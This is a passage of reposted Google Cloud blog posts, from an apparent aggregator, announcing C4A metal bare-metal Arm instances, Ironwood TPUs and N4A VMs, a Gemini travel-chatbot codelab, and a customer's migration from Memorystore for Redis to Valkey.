Once available, developers can deploy scalable Cuttlefish environment farms on top C4A metal instances with an upcoming release of Horizon or by directly leveraging Cloud Android Orchestration. C4A metal allows these virtual devices to run directly on the physical hardware, providing the performance needed to build and manage large, high-fidelity test farms for true continuous testing.

Bare metal access without compromise

As a cloud offering, C4A metal enables a lower total cost of ownership by replacing the entire lifecycle of physical hardware procurement and management with a predictable operational expense. This eliminates the direct capital expenditures of purchasing servers, along with the associated operational costs of hardware maintenance contracts, power, cooling, and physical data center space. You can programmatically provision and de-provision instances to match your exact testing demands, ensuring you are not paying for an over-provisioned fleet of servers sitting idle waiting for peak development cycles.

Operating as standard compute resources within your Virtual Private Cloud (VPC), C4A metal instances inherit and leverage the same security policies, audit logging, and network controls as virtual machines. Instances are designed to appear as physical servers to your toolchain and support common monitoring and security agents, allowing for straightforward integration with your existing Google Cloud environments. This integration extends to storage, where network-attached Hyperdisk allows you to manage persistent disks using the same snapshot and resizing tools your teams already use for your virtual machine fleet.

“For our build system, true isolation is paramount. Running on Google Cloud’s new C4A metal instance on Axion enables us to isolate our package builds with a strong hypervisor security boundary without compromising on build performance.” – Matthew Moore, Founder and CTO, Chainguard, Inc

Better together: the Axion C and N series

The addition of C4A metal to the Arm-based Axion portfolio allows customers to lower TCO by matching the right infrastructure to every workload. While Axion C4A virtual machines optimize for consistently high performance and N4A virtual machines (now in preview) optimize for price-performance and flexibility, C4A metal addresses the critical need for direct hardware access by specialized applications that require a non-virtualized Arm environment.

For example, an Android development company could create a highly efficient CI/CD pipeline by using C4A virtual machines for the build farm. For large-scale testing, they could use C4A metal to run Cuttlefish virtual devices directly on the physical hardware, eliminating nested virtualization overhead. To enable even higher fidelity, they can run Cuttlefish hybrid devices on C4A metal, reusing the system images from their physical hardware. Concurrently, supporting infrastructure such as CI/CD orchestrators and artifact repositories could run on cost-effective N4A instances, using Custom Machine Types to right-size resources and minimize operational expenses.

Coming soon to preview

C4A metal is scheduled for preview soon. Please fill this form to sign up for early access and additional updates.

Read More for the details.

2025 11 06

GCP – Announcing Ironwood TPUs General Availability and new Axion VMs to power the age of inference

Tibor Kiss Cloud, Google Cloud gcp

Today’s frontier models, including Google’s Gemini, Veo, Imagen, and Anthropic’s Claude train and serve on Tensor Processing Units (TPUs). For many organizations, the focus is shifting from training these models to powering useful, responsive interactions with them. Constantly shifting model architectures, the rise of agentic workflows, plus near-exponential growth in demand for compute, define this new age of inference. In particular, agentic workflows that require orchestration and tight coordination between general-purpose compute and ML acceleration are creating new opportunities for custom silicon and vertically co-optimized system architectures.

We have been preparing for this transition for some time and today, we are announcing the availability of three new products built on custom silicon that deliver exceptional performance, lower costs, and enable new capabilities for inference and agentic workloads:

Ironwood, our seventh generation TPU, will be generally available in the coming weeks. Ironwood is purpose-built for the most demanding workloads: from large-scale model training and complex reinforcement learning (RL) to high-volume, low-latency AI inference and model serving. It offers a 10X peak performance improvement over TPU v5p and more than 4X better performance per chip for both training and inference workloads compared to TPU v6e (Trillium), making Ironwood our most powerful and energy-efficient custom silicon to date.
New Arm®-based Axion instances. N4A, our most cost-effective N series virtual machine to date, is now in preview. N4A offers up to 2x better price-performance than comparable current-generation x86-based VMs. We are also pleased to announce C4A metal, our first Arm-based bare metal instance, will be coming soon in preview.

Ironwood and these new Axion instances are just the latest in a long history of custom silicon innovation at Google, including TPUs, Video Coding Units (VCU) for YouTube, and five generations of Tensor chips for mobile. In each case, we build these processors to enable breakthroughs in performance that are only possible through deep, system-level co-design, with model research, software, and hardware development under one roof. This is how we built the first TPU ten years ago, which in turn unlocked the invention of the Transformer eight years ago — the very architecture that powers most of modern AI. It has also influenced more recent advancements like our Titanium architecture, and advanced liquid cooling that we’ve deployed at GigaWatt scale with fleet-wide uptime of ~99.999% since 2020.

Pictured: An Ironwood board showing three Ironwood TPUs connected to liquid cooling.

Pictured: Third-generation Cooling Distribution Units, providing liquid cooling to an Ironwood superpod.

Ironwood: The fastest path from model training to planet-scale inference

The early response to Ironwood is overwhelmingly enthusiastic. Anthropic is compelled by the impressive price-performance gains that accelerate their path from training massive Claude models to serving them to millions of users. In fact, Anthropic plans to access up to 1 million TPUs:

“Our customers, from Fortune 500 companies to startups, depend on Claude for their most critical work. As demand continues to grow exponentially, we’re increasing our compute resources as we push the boundaries of AI research and product development. Ironwood’s improvements in both inference performance and training scalability will help us scale efficiently while maintaining the speed and reliability our customers expect.” – James Bradbury, Head of Compute, Anthropic

Ironwood is being used by organizations of all sizes and across industries:

“Our mission at Lightricks is to define the cutting edge of open creativity, and that demands AI infrastructure that eliminates friction and cost at scale. We relied on Google Cloud TPUs and its massive ICI domain to achieve our breakthrough training efficiency for LTX-2, our leading open-source multimodal generative model. Now, as we enter the age of inference, our early testing makes us highly enthusiastic about Ironwood. We believe that Ironwood will enable us to create more nuanced, precise, and higher-fidelity image and video generation for our millions of global customers.” – Yoav HaCohen, Research Director, GenAI Foundational Models, Lightricks

“At Essential AI, our mission is to build powerful, open frontier models. We need massive, efficient scale, and Google Cloud’s Ironwood TPUs deliver exactly that. The platform was incredibly easy to onboard, allowing our engineers to immediately leverage its power and focus on accelerating AI breakthroughs.” – Philip Monk, Infrastructure Lead, Essential AI

System-level design maximizes inference performance, reliability, and cost

TPUs are a key component of AI Hypercomputer, our integrated supercomputing system that brings together compute, networking, storage, and software to improve system-level performance and efficiency. At the macro level, according to a recent IDC report, AI Hypercomputer customers achieved on average 353% three-year ROI, 28% lower IT costs, and 55% more efficient IT teams.

Ironwood TPUs will help customers push the limits of scale and efficiency even further. When you deploy TPUs, the system connects each individual chip to each other, creating a pod — allowing the interconnected TPUs to work as a single unit. With Ironwood, we can scale up to 9,216 chips in a superpod linked with breakthrough Inter-Chip Interconnect (ICI) networking at 9.6 Tb/s. This massive connectivity allows thousands of chips to quickly communicate with each other and access a staggering 1.77 Petabytes of shared High Bandwidth Memory (HBM), overcoming data bottlenecks for even the most demanding models.

Pictured: Part of an Ironwood superpod, directly connecting 9,216 Ironwood TPUs in a single domain.

At that scale, services demand uninterrupted availability. That’s why our Optical Circuit Switching (OCS) technology acts as a dynamic, reconfigurable fabric, instantly routing around interruptions to restore the workload while your services keep running. And when you need more power, Ironwood scales across pods into clusters of hundreds of thousands of TPUs.

Pictured: Jupiter data center network enables the connection of multiple Ironwood superpods into clusters of hundreds of thousands of TPUs.

The AI Hypercomputer advantage: Hardware and software co-designed for faster, more efficient outcomes

On top of this hardware is a co-designed software layer, where our goal is to maximize Ironwood’s massive processing power and memory, and make it easy to use throughout the AI lifecycle.

To improve fleet efficiency and operations, we’re excited to announce that TPU customers can now benefit from Cluster Director capabilities in Google Kubernetes Engine. This includes advanced maintenance and topology awareness for intelligent scheduling and highly resilient clusters.
For pre-training and post-training, we’re also sharing new enhancements to MaxText, a high-performance, open source LLM framework, to make it easier to implement the latest training and reinforcement learning optimization techniques, such as Supervised Fine-Tuning (SFT) and Generative Reinforcement Policy Optimization (GRPO).
For inference, we recently announced enhanced support for TPUs in vLLM, allowing developers to switch between GPUs and TPUs, or run both, with only a few minor configuration changes, and GKE Inference Gateway, which intelligently load balances across TPU servers to reduce time-to-first-token (TTFT) latency by up to 96% and serving costs by up to 30%.

Our software layer is what enables AI Hypercomputer’s high performance and reliability for training, tuning, and serving demanding AI workloads at scale. Thanks to deep integrations across the stack — from data-center-wide hardware optimizations to open software and managed services— Ironwood TPUs are our most powerful and energy-efficient TPUs to date. Learn more about our approach to hardware and software co-design here.

Axion: Redefining general-purpose compute

Building and serving modern applications requires both highly specialized accelerators and powerful, efficient general-purpose compute. This was our vision for Axion, our custom Arm Neoverse®-based CPUs, which we designed to deliver compelling performance, cost and energy efficiency for everyday workloads.

Today, we are expanding our Axion portfolio with:

N4A (preview), our second general-purpose Axion VM, which is ideal for microservices, containerized applications, open-source databases, batch, data analytics, development environments, experimentation, data preparation and web serving jobs that make AI applications possible. Learn more about N4A here.
C4A metal (in preview soon), our first Arm-based bare-metal instance, which provides dedicated physical servers for specialized workloads such Android development, automotive in-car systems, software with strict licensing requirements, scale test farms, or running complex simulations. Learn more about C4A metal here.

With today’s announcements, the Axion portfolio now includes three powerful options, N4A, C4A and C4A metal. Together, the C and N series allow you to lower the total cost of running your business without compromising on performance or workload-specific requirements.

Axion-based Instance	Optimized for	Key Features
N4A (preview)	Price-performance and flexibility	Up to 64 vCPUs, 512GB of DDR5 Memory, and 50 Gbps networking, with support for Custom Machine Types, Hyperdisk Balanced and Throughput storage.
C4A Metal (in preview soon)	Specialized workloads, such as Hypervisors and native Arm development	Up to 96 vCPUs, 768GB of DDR5 Memory, Hyperdisk storage and up to 100Gbps of networking
C4A	Consistently high performance	Up to 72 vCPUs, 576GB of DDR5 Memory, 100Gbps of Tier 1 networking, Titanium SSD with up to 6TB of local capacity, advanced maintenance controls and support for Hyperdisk Balanced, Throughput, and Extreme.

Axion’s inherent efficiency also makes it a valuable option for modern AI workflows. While specialized accelerators like Ironwood handle the complex task of model serving, Axion excels at the operational backbone: supporting high-volume data preparation, ingestion, and running application servers that host your intelligent applications. Axion is already translating into customer impact:

A powerful combination for AI and everyday computing

To thrive in an era with constantly shifting model architectures, software, and techniques, you need a combination of purpose-built AI accelerators for model training and serving, alongside efficient, general-purpose CPUs for the everyday workloads, including the workloads that support those AI applications.

Ultimately, whether you use Ironwood and Axion together or mix and match them with the other compute options available on AI Hypercomputer, this system-level approach gives you the ultimate flexibility and capability for the most demanding workloads. Sign up to test Ironwood, Axion N4A, or C4A metal today.

Read More for the details.

2025 11 06

GCP – Your First AI Application is Easier Than You Think

Tibor Kiss Cloud, Google Cloud gcp

If you’re a developer, you’ve seen generative AI everywhere. It can feel like a complex world of models and advanced concepts. It can be difficult to know where to actually start.

The good news is that building your first AI-powered application is more accessible than you might imagine. You don’t need to be an AI expert to get started. This post introduces a new codelab designed to bridge this gap and provide you with a first step. We’ll guide you through the entire process of building a functional, interactive travel chatbot using Google’s Gemini model.

Dive into the codelab and build your first AI application today!

Setting the Stage: Your First Project

In this codelab, you’ll step into the role of a developer at a travel company tasked with building a new chat application. You’ll start with a basic web application frontend and, step-by-step, you will bring it to life by connecting it to the power of generative AI.

By the end, you will have built a travel assistant that can:

Answer questions about travel destinations.
Provide personalized recommendations.
Fetch real-time data, like the weather, to give genuinely helpful advice.

The process is broken down into a few key stages.

Making the First Connection

Before you can do anything fancy, you need to get your application talking to the AI model. An easy way to do this is with the Vertex AI SDK, a complete library for interacting with the Vertex AI platform.

While the Vertex AI SDK is a powerful tool for the full machine learning lifecycle, this lab focuses on one of its most-used tools: building generative AI applications. This part of the Vertex AI SDK acts as the bridge between your application and the Gemini model. Without it, you would have to manually handle all the complex wiring yourself—writing code to manage authentication, formatting intricate API requests, and parsing the responses. The Vertex AI SDK handles all that complexity for you so you can focus on what you actually want to do: send a message and get a response.

In this codelab, you’ll see just how simple it is.

Giving your AI purpose with system instructions

Once your app is connected, you’ll notice the AI’s responses won’t be tailored to your purposes yet. One way you can make it more useful for your specific use case is by giving it system instructions.

Hot Tip: Use Google AI Studio to Create Your System Instructions

A great way to develop your system instructions is to leverage Gemini as a creative partner to draft them for you. For example, you could ask Gemini in Google AI Studio to generate a thorough set of instructions for a “sophisticated and friendly travel assistant.”

Once you have a draft, you can immediately test it, also in Google AI Studio. Start a new chat and in the panel to the right, set the Gemini model to the one you’re using in your app and paste the text into the system instruction field. This allows you to quickly interact with the model and see how it behaves with your instructions, all without writing any code. When you’re happy with the results, you can copy the final version directly into your application.

Connecting Your AI to the Real World

This is where you break the model out of its knowledge silo and connect it to live data. By default, an AI model‘s knowledge is limited to the data it was trained on; it doesn’t know today’s weather. However, you can provide Gemini with access to external knowledge using a powerful feature called function calling!

The concept is simple: you write a basic Python function (like one to check the weather) and then describe that tool to the model. Then, when a user asks about the weather, the model can ask your application to run your function and use the live result in its answer. This allows the model to answer questions far beyond its training data, making it a much more powerful and useful assistant with access to up-to-the-minute information.

In this lab, we used the Geocoding API and the Weather Forecast API to provide the app with the ability to factor in the weather when answering questions about travel.

Your Journey Starts Here

Building with AI isn’t about knowing everything at once. It’s about taking the first step, building something tangible, and learning key concepts along the way. This codelab was designed to be that first step. By the end, you won’t just have a working travel chatbot—you’ll have hands-on experience with the fundamental building blocks of a production-ready AI application. You’ll be surprised at what you can build.

Share your progress and connect with others on the journey using the hashtag #ProductionReadyAI. Happy learning!

Read More for the details.

2025 11 05

GCP – How Buildertrend Drives Innovation with Memorystore for Valkey

Tibor Kiss Cloud, Google Cloud gcp

Editor’s note: Today we hear from Buildertrend, a leading provider of cloud-based construction management software. Since 2006, the platform has helped more than a million users globally simplify business management, track financials, and improve communication. To support this massive scale and their ambitious vision, they rely on a robust technology stack on Google Cloud, including, recently, Memorystore for Valkey. Read on to hear about their migration from Memorystore for Redis to the new platform.

Running a construction business is a complex balancing act that requires a constant stream of real-time information to keep projects on track. At Buildertrend, we understand the challenges our customers face — from fluctuating material costs and supply chain delays to managing tight deadlines and the risk of budget overruns — and work to help construction professionals improve efficiency, reduce risk, and enhance collaboration, all while growing their bottom line.

The challenge: Caching at scale

The construction industry has historically been slow to adopt new technologies, hindering efficiency and scalability. At Buildertrend, we aim to change this by being at the forefront of adopting new technology. When Memorystore for Valkey became generally available, we spent time looking into whether it could help us modernize our stack and deliver value to customers. We were attracted by Valkey’s truly open source posture and its promised performance benefits over competing technologies.

Before adopting Memorystore for Valkey, we had used Memorystore for Redis. While it served our basic needs, we found ourselves hitting a wall when it came to a critical feature: native cross-regional replication. As we scaled, we needed a solution that could support a global user base and provide seamless failover in case of a disaster or other issues within a region. We also needed a modern connectivity model such as Google Cloud’s Private Service Connect to enhance network security and efficiency.

As a fully managed, scalable, and highly available in-memory data store, Memorystore for Valkey offered the key features we needed out of the box to take our platform to the next level.

A modern solution for a modern problem

Within this ecosystem, we use Memorystore for Valkey for a variety of critical functions, including:

Database-backed cache: Speeds up data retrieval for a faster user experience
Session state: Manages user sessions for web applications
Job storage: Handles asynchronous task queues for background processes
Pub/Sub idempotency keys: Ensures messages are processed exactly once, preventing data duplication
Authentication tokens: Securely validates user identity with cryptographically signed tokens, enabling fast, scalable authentication

By leveraging the cache in these scenarios, our application is fast, resilient, and ready to meet the demands of our growing customer base. The native cross regional replication helped us support a global user base without having to worry about keeping global caches in sync.

A seamless migration with minimal disruption

Migrating from Memorystore for Redis to Memorystore for Valkey was a smooth process, thanks to close collaboration with the Google Cloud team. We worked with the Google Cloud team to identify the best approach, which for us involved exporting data to Google Cloud Storage and seeding the data at Valkey instance creation, allowing us to migrate with minimal downtime. Because Memorystore for Valkey natively supports Private Service Connect, we were able to eliminate a proxy layer that our engineers used to connect to our Memorystore for Redis instances, simplifying our stack and improving our networking posture.

Looking ahead to a global future

Although it’s still early in our journey, the impact is already clear. Memorystore for Valkey has unlocked our ability to scale and drastically reduced our time to market. It has allowed our team to streamline and own deployment processes, so they can be more agile and responsive.

For us, the future is about global scalability. With nearly 300 Memorystore for Valkey instances in our fleet, we’re building a globally available, cloud-native stack. Our most critical instances are highly optimized to serve up to 30,000 requests per second each, demonstrating the foundation’s scalability and performance.

We strive to use scalable cloud-native technologies, and Memorystore for Valkey will enable us to continue down this path. By using the Memorystore for Valkey managed service, we not only solve technical problems, but also accelerate business growth and empower engineering teams to focus on what matters most: building great products.

Ready to build with Memorystore for Valkey?

Like Buildertrend, you can leverage the power of a fully managed, scalable, and highly available in-memory data store to accelerate your applications and empower your development teams.

To get started, explore the Memorystore for Valkey documentation and sign up for a Google Cloud account!

Read More for the details.